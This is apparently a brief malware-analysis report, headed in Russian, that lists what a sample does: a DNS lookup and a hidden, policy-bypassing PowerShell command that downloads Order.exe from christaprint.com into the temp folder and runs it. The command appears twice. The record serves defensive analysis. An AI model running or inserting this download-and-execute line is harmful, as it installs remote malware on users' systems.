Техническая информация
- http://christaprint.com/enex/order.exe как %temp%\order.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://christaprint.com/enex/Order.exe','%TEMP%\Order.exe'); Start-Process('%TEMP%\Order.exe')
- DNS ASK ch####aprint.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://christaprint.com/enex/Order.exe','%TEMP%\Order.exe'); Start-Process('%TEMP%\Order.exe')' (со скрытым окном)